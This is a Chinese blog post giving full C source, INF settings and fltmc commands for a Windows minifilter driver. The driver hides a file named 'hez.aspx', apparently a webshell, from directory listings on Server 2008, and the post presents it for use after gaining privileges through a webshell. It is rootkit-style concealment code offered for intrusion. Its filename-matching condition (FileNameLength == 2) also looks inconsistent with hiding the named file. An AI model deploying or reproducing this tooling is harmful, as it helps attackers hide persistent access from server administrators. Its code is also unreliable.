server2008 加载驱动隐藏文件或文件夹方法,可在webshell下提权后使用,附切实可行办法
2022-07-15 11:07:22
先附上驱动代码,如何调试请自行查询网上资料,解决windows资源管理器刷新驱动在vs2013下断点需要问题,看代码
#include <fltKernel.h>
#include <dontuse.h>
#include <suppress.h>
#pragma prefast(disable:__WARNING_ENCODE_MEMBER_FUNCTION_POINTER, "Not valid for kernel mode drivers")
// Filter handle returned by FltRegisterFilter in DriverEntry; PtUnload
// passes it back to FltUnregisterFilter.
PFLT_FILTER filterHandle;
// Name that HideFilePostDirCtrl compares (case-insensitively, via _wcsnicmp)
// against each directory entry; matching entries are dropped from the
// enumeration result. Name of the file to hide.
PWCHAR prefixName = L"hez.aspx";
/*************************************************************************
Prototypes
*************************************************************************/
// Driver entry point: registers the minifilter and starts filtering.
NTSTATUS DriverEntry(__in PDRIVER_OBJECT DriverObject, __in PUNICODE_STRING RegistryPath);
// MiniFilterUnload callback: unregisters the filter; always succeeds.
NTSTATUS PtUnload(__in FLT_FILTER_UNLOAD_FLAGS Flags);
// Post-operation callback for IRP_MJ_DIRECTORY_CONTROL; edits the
// FileIdBothDirectoryInformation result buffer after the file system has
// filled it.
FLT_POSTOP_CALLBACK_STATUS
HideFilePostDirCtrl(
    __inout PFLT_CALLBACK_DATA Data,
    __in PCFLT_RELATED_OBJECTS FltObjects,
    __in_opt PVOID CompletionContext,
    __in FLT_POST_OPERATION_FLAGS Flags);
#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, PtUnload)
#endif
// Operation callbacks registered with Filter Manager. Only
// IRP_MJ_DIRECTORY_CONTROL is hooked, and only post-operation: there is no
// pre-operation callback (NULL), so the request itself reaches the file
// system unchanged and only the returned buffer is modified.
CONST FLT_OPERATION_REGISTRATION Callbacks[] =
{
    { IRP_MJ_DIRECTORY_CONTROL,
      0,                        // no FLTFL_OPERATION_REGISTRATION_* flags
      NULL,                     // no pre-operation callback
      HideFilePostDirCtrl },    // post-operation callback
    { IRP_MJ_OPERATION_END }    // terminator
};
// Filter registration structure passed to FltRegisterFilter. No context
// registration and no instance callbacks: with InstanceSetup NULL, Filter
// Manager applies its default attach decision for every volume, so the
// attach performed by `fltmc attach` (or any automatic attach) is never
// refused by this driver. An attached instance is visible to an
// administrator through fltmc.
CONST FLT_REGISTRATION FilterRegistration =
{
    sizeof(FLT_REGISTRATION),   // Size
    FLT_REGISTRATION_VERSION,   // Version
    0,                          // Flags
    NULL,                       // Context
    Callbacks,                  // Operation callbacks
    PtUnload,                   // MiniFilterUnload
    NULL,                       // InstanceSetup
    NULL,                       // InstanceQueryTeardown
    NULL,                       // InstanceTeardownStart
    NULL,                       // InstanceTeardownComplete
    NULL,                       // GenerateFileName
    NULL,                       // GenerateDestinationFileName
    NULL                        // NormalizeNameComponent
};
/*
 * DriverEntry - minifilter entry point.
 *
 * Registers the driver with Filter Manager using FilterRegistration and,
 * on success, starts filtering. If FltStartFiltering fails, the
 * registration is rolled back so the driver is not left half-initialised.
 *
 * DriverObject - driver object supplied by the I/O manager.
 * RegistryPath - unused.
 *
 * Returns the NTSTATUS of the first failing call, else STATUS_SUCCESS.
 * Side effect: stores the registration handle in the global filterHandle.
 */
NTSTATUS DriverEntry(__in PDRIVER_OBJECT DriverObject, __in PUNICODE_STRING RegistryPath)
{
    NTSTATUS status;

    UNREFERENCED_PARAMETER(RegistryPath);

    status = FltRegisterFilter(DriverObject, &FilterRegistration, &filterHandle);
    if (!NT_SUCCESS(status))
    {
        return status;              /* nothing registered, nothing to undo */
    }

    status = FltStartFiltering(filterHandle);
    if (!NT_SUCCESS(status))
    {
        /* undo the registration so a later unload does not see a dead handle */
        FltUnregisterFilter(filterHandle);
    }

    return status;
}
/*
 * PtUnload - MiniFilterUnload callback.
 *
 * Unregisters the filter from Filter Manager. Flags is ignored, so an
 * unload request is never refused: the function always returns
 * STATUS_SUCCESS. Paged code; must run at PASSIVE_LEVEL.
 */
NTSTATUS PtUnload(__in FLT_FILTER_UNLOAD_FLAGS Flags)
{
    PAGED_CODE();
    UNREFERENCED_PARAMETER(Flags);

    FltUnregisterFilter(filterHandle);

    return STATUS_SUCCESS;
}
/*
 * HideFilePostDirCtrl - post-operation callback for IRP_MJ_DIRECTORY_CONTROL.
 *
 * Runs after the file system has completed a directory query. When the
 * request is IRP_MN_QUERY_DIRECTORY with FileInformationClass ==
 * FileIdBothDirectoryInformation, a non-zero buffer length and a successful
 * IoStatus, the returned buffer is walked as a singly linked list of
 * FILE_ID_BOTH_DIR_INFORMATION entries (chained by NextEntryOffset) and every
 * entry whose name compares equal to prefixName under the match condition
 * below is unlinked by adjusting the predecessor's NextEntryOffset.
 *
 * Match condition (see the loop): _wcsnicmp over wcslen(prefixName)
 * characters returns 0 AND FileNameLength == 2.
 *
 * Only FileIdBothDirectoryInformation is handled; queries using any other
 * information class pass through untouched. Requests being drained
 * (FLTFL_POST_OPERATION_DRAINING) are ignored.
 *
 * Outcomes:
 *  - first entry matches: its name is overwritten with L"." and
 *    FileNameLength set to 0, the data is marked dirty and the callback
 *    returns immediately (remaining entries are not examined);
 *  - some entries matched, others kept: data marked dirty;
 *  - every entry matched: IoStatus.Status is set to STATUS_NO_MORE_FILES
 *    (without marking the data dirty);
 *  - nothing matched: buffer left as is.
 * IoStatus.Information is never adjusted.
 *
 * Data              - callback data; Iopb->Parameters.DirectoryControl and
 *                     IoStatus are read, the result buffer may be written.
 * FltObjects        - unused.
 * CompletionContext - unused.
 * Flags             - checked for FLTFL_POST_OPERATION_DRAINING only.
 *
 * Always returns FLT_POSTOP_FINISHED_PROCESSING.
 */
FLT_POSTOP_CALLBACK_STATUS
HideFilePostDirCtrl(
    __inout PFLT_CALLBACK_DATA Data,
    __in PCFLT_RELATED_OBJECTS FltObjects,
    __in_opt PVOID CompletionContext,
    __in FLT_POST_OPERATION_FLAGS Flags)
{
    ULONG nextOffset = 0;
    int modified = 0;               // at least one entry was unlinked
    int removedAllEntries = 1;      // cleared as soon as one entry is kept
    PVOID SafeBuffer;
    PFILE_ID_BOTH_DIR_INFORMATION currentFileInfo = 0;
    PFILE_ID_BOTH_DIR_INFORMATION nextFileInfo = 0;
    PFILE_ID_BOTH_DIR_INFORMATION previousFileInfo = 0;  // last entry that was kept
    UNICODE_STRING fileName;        // declared but not used below
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(CompletionContext);
    if (FlagOn(Flags, FLTFL_POST_OPERATION_DRAINING))
    {
        return FLT_POSTOP_FINISHED_PROCESSING;
    }
    // On Vista/Win7 the FileInformationClass returned is no longer
    // FileBothDirectoryInformation but FileIdBothDirectoryInformation;
    // only that class is handled here.
    if (Data->Iopb->MinorFunction == IRP_MN_QUERY_DIRECTORY &&
        (Data->Iopb->Parameters.DirectoryControl.QueryDirectory.FileInformationClass == FileIdBothDirectoryInformation) &&
        Data->Iopb->Parameters.DirectoryControl.QueryDirectory.Length > 0 &&
        NT_SUCCESS(Data->IoStatus.Status))
    {
        // Resolve the result buffer: map the MDL if present, otherwise use
        // the raw DirectoryBuffer pointer.
        if (Data->Iopb->Parameters.DirectoryControl.QueryDirectory.MdlAddress != NULL)
        {
            SafeBuffer = MmGetSystemAddressForMdlSafe(
                Data->Iopb->Parameters.DirectoryControl.QueryDirectory.MdlAddress,
                NormalPagePriority);
        }
        else
        {
            SafeBuffer = Data->Iopb->Parameters.DirectoryControl.QueryDirectory.DirectoryBuffer;
        }
        if (SafeBuffer == NULL)
        {
            return FLT_POSTOP_FINISHED_PROCESSING;  // MDL mapping failed (low resources)
        }
        currentFileInfo = (PFILE_ID_BOTH_DIR_INFORMATION )SafeBuffer;
        previousFileInfo = currentFileInfo;
        do
        {
            // Byte offset of the next FILE_ID_BOTH_DIR_INFORMATION entry
            // (0 marks the last entry).
            nextOffset = currentFileInfo->NextEntryOffset;
            nextFileInfo = (PFILE_ID_BOTH_DIR_INFORMATION )((PCHAR)(currentFileInfo)+nextOffset);
            // Special case: the matching entry is the first one in the buffer,
            // so there is no predecessor whose NextEntryOffset could skip it.
            // The entry is kept but renamed to "." with a zero name length,
            // and the walk stops here.
            if ((previousFileInfo == currentFileInfo) &&
                (_wcsnicmp(currentFileInfo->FileName, prefixName, wcslen(prefixName)) == 0 &&
                (currentFileInfo->FileNameLength == 2)))
            {
                RtlCopyMemory(currentFileInfo->FileName, L".", 2);
                currentFileInfo->FileNameLength = 0;
                FltSetCallbackDataDirty(Data);
                return FLT_POSTOP_FINISHED_PROCESSING;
            }
            // Entry matches: unlink it by pointing the predecessor past it.
            if (_wcsnicmp(currentFileInfo->FileName, prefixName, wcslen(prefixName)) == 0 && (currentFileInfo->FileNameLength == 2))
            {
                if (nextOffset == 0)
                {
                    previousFileInfo->NextEntryOffset = 0;  // predecessor becomes the last entry
                }
                else
                {
                    // predecessor -> (distance to current) + current -> next
                    previousFileInfo->NextEntryOffset = (ULONG)((PCHAR)currentFileInfo - (PCHAR)previousFileInfo) + nextOffset;
                }
                modified = 1;
            }
            else
            {
                removedAllEntries = 0;
                // Advance the predecessor pointer: this entry is kept.
                previousFileInfo = currentFileInfo;
            }
            // Advance the current pointer.
            currentFileInfo = nextFileInfo;
        } while (nextOffset != 0);
        if (modified)
        {
            if (removedAllEntries)
            {
                // Every entry was unlinked: report the query as exhausted.
                Data->IoStatus.Status = STATUS_NO_MORE_FILES;
            }
            else
            {
                FltSetCallbackDataDirty(Data);
            }
        }
    }
    return FLT_POSTOP_FINISHED_PROCESSING;
}
原因很简单,不要用sc
start启动驱动服务,这样启动具体方法:驱动复制到虚拟机inf右键点安装,然后fltmc load FsFilter2
fltmc attach FsFilter2 c: -a 150000
其中 FsFilter2 驱动名 150000是优先级,使用fltmc可以看所有微驱动只要比luafv高就可以
fltmc load FsFilter2
fltmc attach FsFilter2 c: -a 150000
这2条命令就搞定
卸载命令是
fltmc unload FsFilter2
我已在虚拟机server2008r2实现成功可以隐藏文件或文件夹
原因是默认驱动高度模版attributes=高度未定义
这样定义就可以
;;;
;;; FsFilter2
;;;
[Version]
Signature = "$Windows NT$"
; TODO - Change the Class and ClassGuid to match the Load Order Group value, see http://msdn.microsoft.com/en-us/windows/hardware/gg462963
; Class = "ActivityMonitor" ;This is determined by the work this filter driver does
; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value
Class = "_TODO_Change_Class_appropriately_"
ClassGuid = {_TODO_Change_ClassGuid_appropriately_}
Provider = %ManufacturerName%
DriverVer =
CatalogFile = FsFilter2.cat
[DestinationDirs]
DefaultDestDir = 12
MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers
;;
;; Default install sections
;;
[DefaultInstall]
OptionDesc = %ServiceDescription%
CopyFiles = MiniFilter.DriverFiles
[DefaultInstall.Services]
AddService = %ServiceName%,,MiniFilter.Service
;;
;; Default uninstall sections
;;
[DefaultUninstall]
DelFiles = MiniFilter.DriverFiles
[DefaultUninstall.Services]
DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting
;
; Services Section
;
[MiniFilter.Service]
DisplayName = %ServiceName%
Description = %ServiceDescription%
ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\
Dependencies = "FltMgr"
ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER
StartType = 0 ;SERVICE_DEMAND_START
ErrorControl = 1 ;SERVICE_ERROR_NORMAL
; TODO - Change the Load Order Group value, see http://connect.microsoft.com/site221/content/content.aspx?ContentID=2512
; LoadOrderGroup = "FSFilter Activity Monitor"
LoadOrderGroup = "_TODO_Change_LoadOrderGroup_appropriately_"
AddReg = MiniFilter.AddRegistry
;
; Registry Modifications
;
[MiniFilter.AddRegistry]
HKR,,"DebugFlags",0x00010001 ,0x0
HKR,,"SupportedFeatures",0x00010001,0x3
HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance%
HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,409999
HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,0
;
; Copy Files
;
[MiniFilter.DriverFiles]
%DriverName%.sys
[SourceDisksFiles]
FsFilter2.sys = 1,,
[SourceDisksNames]
1 = %DiskId1%,,,
;;
;; String Section
;;
[Strings]
; TODO - Add your manufacturer
ManufacturerName = "Template"
ServiceDescription = "FsFilter2 Mini-Filter Driver"
ServiceName = "FsFilter2"
DriverName = "FsFilter2"
DiskId1 = "FsFilter2 Device Installation Disk"
;Instances specific information.
DefaultInstance = "FsFilter2 Instance"
Instance1.Name = "FsFilter2 Instance"
; TODO - Change the altitude value, see http://connect.microsoft.com/site221/content/content.aspx?ContentID=2512
;Instance1.Altitude = "370030"
Instance.Altitude = "_TODO_Change_Altitude_appropriately_"
Instance1.Flags = 0x0 ; Allow all attachments